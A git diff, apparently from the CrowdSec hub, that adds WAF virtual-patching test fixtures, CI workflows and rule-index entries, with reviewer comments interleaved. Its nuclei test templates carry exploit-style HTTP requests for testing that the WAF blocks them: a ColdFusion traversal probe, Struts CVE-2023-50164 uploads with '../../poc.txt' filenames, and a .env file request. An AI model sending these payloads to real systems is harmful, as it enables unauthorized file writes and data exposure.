new file mode 100644
index 00000000000..bbb902a9678
--- /dev/null
+++ b/.appsec-tests/CVE-2023-3519/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml
+nuclei_template: CVE-2023-3519.yaml
diff --git a/.appsec-tests/CVE-2023-38205/CVE-2023-38205.yaml b/.appsec-tests/CVE-2023-38205/CVE-2023-38205.yaml
new file mode 100755
index 00000000000..0043e395418
--- /dev/null
+++ b/.appsec-tests/CVE-2023-38205/CVE-2023-38205.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-38205
+info:
+ name: CVE-2023-38205
+ author: crowdsec
+ severity: info
+ description: CVE-2023-38205 testing
+ tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+ - raw:
+ - |
+ GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
diff --git a/.appsec-tests/CVE-2023-38205/config.yaml b/.appsec-tests/CVE-2023-38205/config.yaml
new file mode 100644
index 00000000000..7c5e456aef0
--- /dev/null
+++ b/.appsec-tests/CVE-2023-38205/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml
+nuclei_template: CVE-2023-38205.yaml
diff --git a/.appsec-tests/CVE-2023-50164/CVE-2023-50164.yaml b/.appsec-tests/CVE-2023-50164/CVE-2023-50164.yaml
new file mode 100755
index 00000000000..43ccb950eb3
--- /dev/null
+++ b/.appsec-tests/CVE-2023-50164/CVE-2023-50164.yaml
@@ -0,0 +1,79 @@
+id: CVE-2023-50164
+info:
+ name: CVE-2023-50164
+ author: crowdsec
+ severity: info
+ description: CVE-2023-50164 testing
+ tags: appsec-testing
+http:
+ - raw:
+ - |
+ POST /s2_066_war_exploded/upload.action HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en-US,en;q=0.9
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ Accept-Encoding: gzip, deflate, br
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
+ Content-Length: 593
+
+ ------WebKitFormBoundary5WJ61X4PRwyYKlip
+ Content-Disposition: form-data; name="upload"; filename="poc.txt"
+ Content-Type: text/plain
+
+ test
+
+
+ ------WebKitFormBoundary5WJ61X4PRwyYKlip
+ Content-Disposition: form-data; name="uploadFileName";
+
+ ../../poc.txt
+
+ ------WebKitFormBoundary5WJ61X4PRwyYKlip--
+ - |
+ POST /s2_066_war_exploded/upload.action HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en-US,en;q=0.9
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ Accept-Encoding: gzip, deflate, br
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
+ Content-Length: 593
+
+ ------WebKitFormBoundary5WJ61X4PRwyYKlip
+ Content-Disposition: form-data; name="upload"; filename="poc.txt"
+ Content-Type: text/plain
+
+ test
+
+
+ ------WebKitFormBoundary5WJ61X4PRwyYKlip
+ Content-Disposition: form-data; name="uPlOadFiLeNamE";
+
+ ../../poc.txt
+
+ ------WebKitFormBoundary5WJ61X4PRwyYKlip--
+ - |
+ POST /s2_066_war_exploded/upload.action?uploadFileName=../../poc.txt HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en-US,en;q=0.9
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ Accept-Encoding: gzip, deflate, br
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
+ Content-Length: 593
+
+ ------WebKitFormBoundary5WJ61X4PRwyYKlip
+ Content-Disposition: form-data; name="upload"; filename="poc.txt"
+ Content-Type: text/plain
+
+ test
+
+
+ ------WebKitFormBoundary5WJ61X4PRwyYKlip
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - 'status_code_1 == 403'
+ - 'status_code_2 == 403'
+ - 'status_code_3 == 403'
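Review bot: The third request's multipart body stops after an opened part with no closing `------WebKitFormBoundary5WJ61X4PRwyYKlip--`, while `Content-Length: 593` is copied unchanged from the first two requests whose bodies are longer. If the point of the third case is that the traversal arrives via the `uploadFileName` query parameter and the body is irrelevant, a comment above that raw block should say so; if not, the body should be completed. Whether the stated Content-Length matters depends on whether the harness lets nuclei recompute it, which this page does not show.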
diff --git a/.appsec-tests/CVE-2023-50164/config.yaml b/.appsec-tests/CVE-2023-50164/config.yaml
new file mode 100644
index 00000000000..3bac2e3a4b7
--- /dev/null
+++ b/.appsec-tests/CVE-2023-50164/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml
+nuclei_template: CVE-2023-50164.yaml
diff --git a/.appsec-tests/cve-2023-42793/config.yaml b/.appsec-tests/cve-2023-42793/config.yaml
new file mode 100644
index 00000000000..0f351751bcf
--- /dev/null
+++ b/.appsec-tests/cve-2023-42793/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml
+nuclei_template: cve-2023-42793.yaml
diff --git a/.appsec-tests/cve-2023-42793/cve-2023-42793.yaml b/.appsec-tests/cve-2023-42793/cve-2023-42793.yaml
new file mode 100644
index 00000000000..ce0505da035
--- /dev/null
+++ b/.appsec-tests/cve-2023-42793/cve-2023-42793.yaml
@@ -0,0 +1,22 @@
+id: cve-2023-42793
+info:
+ name: cve-2023-42793
+ author: crowdsec
+ severity: medium
+ description: |
+ cve-2023-42793 testing
+ tags: appsec-testing
+
+http:
+ - raw:
+ - |
+ GET /rpc2 HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: status
+ status:
+ - 403
+
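Review bot: This is the only test whose directory, id and `nuclei_template` value are lowercase (`cve-2023-42793`) while the referenced rule file is `vpatch-CVE-2023-42793.yaml` and every sibling directory is uppercase; if any discovery or lint step matches names case-sensitively this test is the one that gets missed. I would rename the directory and id to `CVE-2023-42793` for consistency. The probe is also a bare `GET /rpc2` with no negative case, so, unlike vpatch-env-access, nothing here would catch a rule that over-blocks; a second benign request with an expected non-403 status would make the test two-sided.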
diff --git a/.appsec-tests/template_acquis.yaml b/.appsec-tests/template_acquis.yaml
new file mode 100644
index 00000000000..5aba47f6dbb
--- /dev/null
+++ b/.appsec-tests/template_acquis.yaml
@@ -0,0 +1,7 @@
+listen_addr: 127.0.0.1:4241
+source: appsec
+log_level: debug
+labels:
+ type: appsec
+#appsec_config: appsec-test
+appsec_config_path: ./runtime/appsec-configs/config.yaml
\ No newline at end of file
diff --git a/.appsec-tests/template_appsec-profile.yaml b/.appsec-tests/template_appsec-profile.yaml
new file mode 100644
index 00000000000..f0f976df3b6
--- /dev/null
+++ b/.appsec-tests/template_appsec-profile.yaml
@@ -0,0 +1,5 @@
+name: appsec-test
+log_level: debug
+inband_rules:
+ - "crowdsecurity/*" # all rules
+default_remediation: ban
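Review bot: `inband_rules: - "crowdsecurity/*"` loads every installed rule, so the per-test isolation promised by the `appsec-rules` list in each config.yaml holds only if the harness installs nothing beyond that list; if it installs the full collection, a test can pass because an unrelated rule blocked the request. A comment stating that assumption, e.g. `# the harness installs only the rules listed in the test's config.yaml`, would make the dependency explicit; I cannot verify the harness from this page. `log_level: debug` is fine for CI but will be noisy if these templates are reused elsewhere.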
diff --git a/.appsec-tests/template_config.yaml b/.appsec-tests/template_config.yaml
new file mode 100644
index 00000000000..c443955ecab
--- /dev/null
+++ b/.appsec-tests/template_config.yaml
@@ -0,0 +1,48 @@
+common:
+ daemonize: false
+ pid_dir: ./runtime
+ log_media: file
+ log_level: info
+ log_dir: ./runtime/log/
+ working_dir: .
+config_paths:
+ config_dir: ./runtime/
+ data_dir: ./runtime/data/
+ simulation_path: ./runtime/simulation.yaml
+ hub_dir: ./runtime/hub/
+ index_path: ./runtime/hub/.index.json
+ notification_dir: ./runtime/notifications/
+ plugin_dir: /usr/local/lib/crowdsec/plugins/
+crowdsec_service:
+ parser_routines: 1
+ acquisition_path: ./runtime/acquis.yaml
+cscli:
+ output: human
+db_config:
+ log_level: info
+ type: sqlite
+ db_path: ./runtime/data/crowdsec.db
+ #user:
+ #password:
+ #db_name:
+ #host:
+ #port:
+ flush:
+ max_items: 5000
+ max_age: 7d
+plugin_config:
+ user: nobody # plugin process would be ran on behalf of this user
+ group: nogroup # plugin process would be ran on behalf of this group
+api:
+ client:
+ insecure_skip_verify: false
+ credentials_path: ./runtime/local_api_credentials.yaml
+ server:
+ log_level: info
+ listen_uri: 127.0.0.1:8181
+ profiles_path: ./runtime/profiles.yaml
+prometheus:
+ enabled: true
+ level: full
+ listen_addr: 127.0.0.1
+ listen_port: 6060
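Review bot: `plugin_dir: /usr/local/lib/crowdsec/plugins/` is the one absolute path in a config where everything else lives under `./runtime`; on a CI runner that directory normally does not exist, and whether crowdsec tolerates a missing plugin dir is not shown here. Pointing it at `./runtime/plugins/` keeps the test environment self-contained. `prometheus.enabled: true` with `level: full` also opens a listener on 6060 that nothing in these tests reads; harmless on 127.0.0.1, but it can be disabled to reduce what the test process exposes.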
diff --git a/.appsec-tests/template_profiles.yaml b/.appsec-tests/template_profiles.yaml
new file mode 100644
index 00000000000..ad917ff252d
--- /dev/null
+++ b/.appsec-tests/template_profiles.yaml
@@ -0,0 +1,13 @@
+name: default_ip_remediation
+#debug: true
+filters:
+ - Alert.Remediation == true && Alert.GetScope() == "Ip"
+decisions:
+ - type: ban
+ duration: 4h
+# notifications:
+# - slack_default # Set the webhook in /etc/crowdsec/notifications/slack.yaml before enabling this.
+# - splunk_default # Set the splunk url and token in /etc/crowdsec/notifications/splunk.yaml before enabling this.
+# - http_default # Set the required http parameters in /etc/crowdsec/notifications/http.yaml before enabling this.
+on_success: break
+
diff --git a/.appsec-tests/template_simulation.yaml b/.appsec-tests/template_simulation.yaml
new file mode 100644
index 00000000000..e9c68999350
--- /dev/null
+++ b/.appsec-tests/template_simulation.yaml
@@ -0,0 +1,4 @@
+simulation: off
+# exclusions:
+# - crowdsecurity/ssh-bf
+
\ No newline at end of file
diff --git a/.appsec-tests/vpatch-env-access/config.yaml b/.appsec-tests/vpatch-env-access/config.yaml
new file mode 100644
index 00000000000..e6bc95b6212
--- /dev/null
+++ b/.appsec-tests/vpatch-env-access/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-env-access.yaml
+nuclei_template: vpatch-env-access.yaml
diff --git a/.appsec-tests/vpatch-env-access/vpatch-env-access.yaml b/.appsec-tests/vpatch-env-access/vpatch-env-access.yaml
new file mode 100755
index 00000000000..65e84701967
--- /dev/null
+++ b/.appsec-tests/vpatch-env-access/vpatch-env-access.yaml
@@ -0,0 +1,24 @@
+id: vpatch-env-access
+info:
+ name: vpatch-env-access
+ author: crowdsec
+ severity: info
+ description: vpatch-env-access testing
+ tags: appsec-testing
+http:
+ - raw:
+ - |
+ GET /foo/bar/.env HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET /foo/bar/ HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+#test will fail because we won't match http status
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - 'status_code_1 == 403'
+ - 'status_code_2 == 404'
diff --git a/.github/workflows/appsec_vpatch_lint.yaml b/.github/workflows/appsec_vpatch_lint.yaml
new file mode 100644
index 00000000000..35560902077
--- /dev/null
+++ b/.github/workflows/appsec_vpatch_lint.yaml
@@ -0,0 +1,40 @@
+name: Vpatch collection lint
+on:
+ push:
+ paths:
+ - "appsec-rules/**.yaml"
+ - "appsec-rules/**.yml"
+ - "scripts/**.py"
+ - ".github/workflows/appsec_vpatch_lint.yaml"
+ - "./collections/crowdsecurity/appsec-virtual-patching.yaml"
+
+jobs:
+ update-taxonomy:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/setup-python@v4
+ with:
+ python-version: "3.10"
+ - uses: actions/checkout@v1
+ - name: Get changed files
+ run: |
+ changed_files=$(git diff-tree --no-commit-id --name-only -r $GITHUB_SHA | tr '\n' ',' | sed 's/,$/\n/')
+ echo "changed_files=${changed_files}" >> $GITHUB_ENV
+ - name: Create local changes
+ env:
+ AUTHOR: ${{ github.actor }}
+ run: |
+ pip install requests pyyaml mdutils
+ python ./scripts/appsec_vpatch_lint.py -e appsec_vpatch_cve_error.md --hub ./
+ [ -f "appsec_vpatch_cve_error.md" ] && echo "taxonomy_errors=1" >> $GITHUB_ENV || echo "taxonomy_errors=0" >> $GITHUB_ENV
+ - uses: jwalton/gh-find-current-pr@v1
+ id: findPr
+ with:
+ state: open
+ - name: Comment PR if errors
+ if: ${{ (env.taxonomy_errors == '1') && (github.event_name == 'push') && (github.ref != 'refs/heads/master') }}
+ uses: thollander/actions-comment-pull-request@v2
+ with:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ filePath: appsec_vpatch_cve_error.md
+ pr_number: ${{ steps.findPr.outputs.pr }}
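Review bot: The workflow declares no `permissions:` block, so the job runs with the repository's default token scope even though the only write it needs is the PR comment in the `Comment PR if errors` step; a top-level `permissions:` with `contents: read` and `pull-requests: write` pins that to least privilege. The inputs are also unpinned: `pip install requests pyyaml mdutils` takes whatever is current on PyPI, and the three third-party actions are referenced by floating major tags rather than commit SHAs, which is the usual supply-chain hardening ask for a job that hands out `secrets.GITHUB_TOKEN`. The `Get changed files` step exports `changed_files` to `$GITHUB_ENV`, but nothing later in the job reads it, so either wire it into the lint script or drop the step. The path filter `"./collections/crowdsecurity/appsec-virtual-patching.yaml"` carries a `./` prefix unlike its siblings; I would expect it never to match and would drop the prefix.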
diff --git a/.github/workflows/test_appsec_rules.yaml b/.github/workflows/test_appsec_rules.yaml
new file mode 100644
index 00000000000..6770b320e2d
--- /dev/null
+++ b/.github/workflows/test_appsec_rules.yaml
@@ -0,0 +1,76 @@
+name: Appsec Rules Tests
+on:
+ pull_request:
+ branches: [ master ]
+ paths:
+ - 'appsec-configs/**.yaml'
+ - 'appsec-configs/**.yml'
+ - 'appsec-rules/**.yaml'
+ - 'appsec-rules/**.yml'
+ - '.github/workflows/test_appsec_rules.yaml'
+ - '.appsec-tests/**'
+ push:
+ branches: [ master ]
+ paths:
+ - 'appsec-configs/**.yaml'
+ - 'appsec-configs/**.yml'
+ - 'appsec-rules/**.yaml'
+ - 'appsec-rules/**.yml'
+ - '.github/workflows/test_appsec_rules.yaml'
+ - '.appsec-tests/**'
+
+jobs:
+ run-hub-tests:
+ runs-on: ubuntu-20.04
+ steps:
+ - name: Check out code into the Go module directory
+ uses: actions/checkout@v4
+ - uses: actions/setup-go@v4
+ with:
+ go-version: '1.21'
+ - name: Install requirements
+ run: |
+ sudo apt install libre2-dev
+ go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
+ - name: Install CrowdSec
+ run: |
+ git clone https://github.com/crowdsecurity/crowdsec.git
+ cd crowdsec
+ BUILD_STATIC=1 make release
+ cd crowdsec-v*
+ sudo ./wizard.sh --unattended
+ - name: Install NGINX
+ run: |
+ sudo apt install nginx
+ - name: Install CrowdSec NGINX Bouncer
+ run: |
+ git clone https://github.com/crowdsecurity/cs-nginx-bouncer.git
+ cd cs-nginx-bouncer/
+ make release
+ tar xzvf crowdsec-nginx-bouncer.tgz
+ cd crowdsec-nginx-bouncer-v*
+ sudo ./install.sh -y
+ - name: Setup NGINX Bouncer API key
+ run: |
+ sudo cscli bouncers add hubtestAppsec -k "this_is_a_bad_password"
+ sudo sed -i 's/API_KEY=.*$/API_KEY=this_is_a_bad_password/' /etc/crowdsec/bouncers/crowdsec-nginx-bouncer.conf
+ echo "APPSEC_URL=http://127.0.0.1:4241" | sudo tee -a /etc/crowdsec/bouncers/crowdsec-nginx-bouncer.conf
+ sudo systemctl restart nginx
+ - name: run tests on last crowdsec tag
+ run: |
+ cscli hubtest run --all --appsec --debug
+ echo "APPSEC_RULE_COV=$(cscli hubtest coverage --appsec --percent | cut -d '=' -f2)" >> $GITHUB_ENV
+ APPSEC_RULE_COV_NUMBER=$(cscli hubtest coverage --appsec --percent | cut -d '=' -f2 | tr -d '%' | tr -d '[[:space:]]')
+ echo "APPSEC_RULE_BADGE_COLOR=$(if [ "$APPSEC_RULE_COV_NUMBER" -lt "70" ]; then echo 'red'; else echo 'green'; fi)" >> $GITHUB_ENV
+ - name: Create appsec badge
+ uses: schneegans/dynamic-badges-action@v1.1.0
+ #if: ${{ github.ref == 'refs/heads/master' }}
+ if: false
+ with:
+ auth: ${{ secrets.GIST_BADGES_SECRET }}
+ gistID: ${{ secrets.GIST_BADGES_ID }}
+ filename: hub_appsec_badge.json
+ label: Hub Appsec
+ message: ${{ env.APPSEC_RULE_COV }}
+ color: ${{ env.APPSEC_RULE_BADGE_COLOR }}
+
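Review bot: The step named `run tests on last crowdsec tag` does not test a tag: the `Install CrowdSec` step clones `crowdsecurity/crowdsec` with a plain `git clone` and builds whatever the default branch points to, and the bouncer clone and `nuclei@latest` are fetched the same way, so a run is not reproducible and an upstream breakage (or a compromised upstream commit) lands directly in this job. Pinning each to a release makes the step name true, e.g. `git clone --depth 1 --branch <crowdsec-tag> https://github.com/crowdsecurity/crowdsec.git` with the tag kept in a workflow `env:` value rather than hard-coded per step. Minor: the `apt install` calls have no preceding `apt-get update` and no `-y`, which may abort on a non-interactive runner, and the `Create appsec badge` step is disabled with `if: false` while its intended `github.ref == 'refs/heads/master'` guard sits in a comment — either wire the guard in or remove the step so the `GIST_BADGES_*` secrets are not referenced by dead code.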
diff --git a/.github/workflows/update-index.yml b/.github/workflows/update-index.yml
index 3fc0a5c7beb..5154deb5d86 100644
--- a/.github/workflows/update-index.yml
+++ b/.github/workflows/update-index.yml
@@ -3,21 +3,26 @@ name: Update index
on:
push:
paths:
- - "scenarios/**.yaml"
- - "parsers/**.yaml"
- - "postoverflows/**.yaml"
- - "collections/**.yaml"
- - "scenarios/**.yml"
- - "parsers/**.yml"
- - "postoverflows/**.yml"
- - "collections/**.yml"
- - "scenarios/**.md"
- - "parsers/**.md"
- - "postoverflows/**.md"
- - "collections/**.md"
- - ".github/workflows/update-index.yml"
+ - 'scenarios/**.yaml'
+ - 'parsers/**.yaml'
+ - 'postoverflows/**.yaml'
+ - 'collections/**.yaml'
+ - 'appsec-rules/**.yaml'
+ - 'appsec-configs/**.yaml'
+ - 'scenarios/**.yml'
+ - 'parsers/**.yml'
+ - 'postoverflows/**.yml'
+ - 'collections/**.yml'
+ - 'appsec-rules/**.yml'
+ - 'appsec-configs/**.yml'
+ - 'scenarios/**.md'
+ - 'parsers/**.md'
+ - 'postoverflows/**.md'
+ - 'collections/**.md'
+ - 'appsec-rules/**.md'
+ - 'appsec-configs/**.md'
+ - '.github/workflows/update-index.yml'
- "*.go"
-
jobs:
build:
runs-on: ubuntu-latest
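Review bot: The path list switches every entry from double to single quotes but leaves `- "*.go"` double-quoted, so the block now mixes quoting styles; either keep the original quotes (a smaller diff) or change that line as well. The blank line before `jobs:` is also dropped, which only adds noise to the diff.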
diff --git a/.github/workflows/update_taxonomy.yaml b/.github/workflows/update_taxonomy.yaml
index 5c989451ae9..4a3b83ceeda 100644
--- a/.github/workflows/update_taxonomy.yaml
+++ b/.github/workflows/update_taxonomy.yaml
@@ -5,6 +5,8 @@ on:
paths:
- "scenarios/**.yaml"
- "scenarios/**.yml"
+ - "appsec-rules/**.yaml"
+ - "appsec-rules/**.yml"
- "scripts/**.py"
- ".github/workflows/update_taxonomy.yaml"
- "scripts/.scenariosignore"
diff --git a/.gitignore b/.gitignore
index cf5d8960d4f..c7ef590bf83 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,6 +8,9 @@
.tests/*/parser-dump.yaml
.tests/*/runtime/*
+.appsec-tests/*/results/*
+.appsec-tests/*/runtime/*
+
## tmp files
taxonomy/scenario_taxonomy_errors.md
diff --git a/.index.json b/.index.json
index 863d7aec119..cefc43764ea 100644
--- a/.index.json
+++ b/.index.json
@@ -1,4 +1,717 @@
{
+ "appsec-configs": {
+ "crowdsecurity/crs": {
+ "path": "appsec-configs/crowdsecurity/crs.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "e9cbc67cae76d60468e40f54db62c97157e203bc06c412239695c843ef98f987",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "fd41693ebf881d1cb561cd6a163c9da47c50c480829efe4ddca74f6ec3847855",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS9jcnMKZGVmYXVsdF9yZW1lZGlhdGlvbjogYmFuCiNsb2dfbGV2ZWw6IGRlYnVnCm91dG9mYmFuZF9ydWxlczoKIC0gY3Jvd2RzZWN1cml0eS9jcnM=",
+ "author": "crowdsecurity",
+ "labels": null
+ },
+ "crowdsecurity/virtual-patching": {
+ "path": "appsec-configs/crowdsecurity/virtual-patching.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "48a765ded560cf4d8bb405e563411245156b6b2c2fef09e5492e6270f5337bff",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "0bf15e1ebed4c94933bf9407d616be22121733ddd327710f7f5b79ec70d52085",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "e93cc5d63aae3a83794b0f6b1e41566f53fae059e6044a9519f02256fa6e2adf",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92aXJ0dWFsLXBhdGNoaW5nCmRlZmF1bHRfcmVtZWRpYXRpb246IGJhbgojbG9nX2xldmVsOiBkZWJ1ZwppbmJhbmRfcnVsZXM6CiAtIGNyb3dkc2VjdXJpdHkvYmFzZS1jb25maWcgCiAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLSoKIyBpbmJhbmRfb3B0aW9uczoKIyAgZGlzYWJsZV9ib2R5X2luc3BlY3Rpb246IHRydWUK",
+ "author": "crowdsecurity",
+ "labels": null
+ }
+ },
+ "appsec-rules": {
+ "crowdsecurity/base-config": {
+ "path": "appsec-rules/crowdsecurity/base-config.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "5ef93f4b19a028f2415afaf570df4d20a5f6038fa94cc990a387662303c2ef20",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "author": "crowdsecurity",
+ "labels": null
+ },
+ "crowdsecurity/crs": {
+ "path": "appsec-rules/crowdsecurity/crs.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "786fe3341c0f0a813eb57b7780620181686081e0f181515509290f2e8c042f0b",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "19d216b68b3de8a9c03e4d6644f578520b3673096ef55da6d77bf40902a36cab",
+ "deprecated": false
+ }
+ },
+ "content": "",
+ "author": "crowdsecurity",
+ "labels": null
+ },
+ "crowdsecurity/vpatch-CVE-2017-9841": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "0737417a66c5327708f6eff4392a4461002592fabcda6cdbdaa4143bce185503",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "6e5549b580c3a35315a6660a2904eafd3b463141d95f1ad2d5d606d55eb0b046",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2017-9841 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2017-9841",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-94"
+ ],
+ "confidence": 3,
+ "label": "PHPUnit RCE (CVE-2017-9841)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2019-12989": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "a2f681cb8b762e33a66e63343a9fce32d5416438322ec376946ff78428543714",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "a8137b302f6fa55456dcf9cb7e9e9ba11dd878f0b91c90b3910fa4af397e0218",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTktMTI5ODkKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMTktMTI5ODkgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC9zZHdhbi9uaXRyby92MS9jb25maWcvZ2V0X3BhY2thZ2VfZmlsZQogICAgLSB6b25lczoKICAgICAgLSBBUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgIC0gYWN0aW9uCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICJmaWxlX2Rvd25sb2FkIgogICAgLSB6b25lczoKICAgICAgLSBCT0RZX0FSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAgLSBqc29uLmdldF9wYWNrYWdlX2ZpbGUuc2l0ZV9uYW1lCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGxpYmluamVjdGlvblNRTApsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJjaXRyaXggU1FMaSAoQ1ZFLTIwMTktMTI5ODkpIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAxOS0xMjk4OQogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtODk=",
+ "description": "Detect CVE-2019-12989 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2019-12989",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-89"
+ ],
+ "confidence": 3,
+ "label": "citrix SQLi (CVE-2019-12989)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2020-11738": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml",
+ "version": "0.4",
+ "versions": {
+ "0.1": {
+ "digest": "4760198ce14851e3387470bc0270f662b58aa32b8ef1f4217af6818e4f0cedbe",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "d939fd479841838064eb205911dd20f35a8070eea2734cf4e0c7bd0c2b5444fe",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "d82023967b6e1516519bf0adf7ae5e4d192c19039434267cffd73058f550c2fc",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "e73f8dadfeb909e98e3609d0cc098533f2c0351503cabebdf92a43f9d1b3e94c",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2020-11738 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2020-11738",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-22"
+ ],
+ "confidence": 3,
+ "label": "Wordpress Snap Creek Duplicator (CVE-2020-11738)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2021-22941": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "994975ada2914e56168b94db4acb5f28293673fcf824d35619d5e35539cf8052",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "0057a096e2d27ce5264d9481dd073bf97d7ef9a6b7e3e11785cfd8dde880db56",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detect CVE-2021-22941 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2021-22941",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-284"
+ ],
+ "confidence": 3,
+ "label": "Citrix RCE (CVE-2021-22941)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2021-3129": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
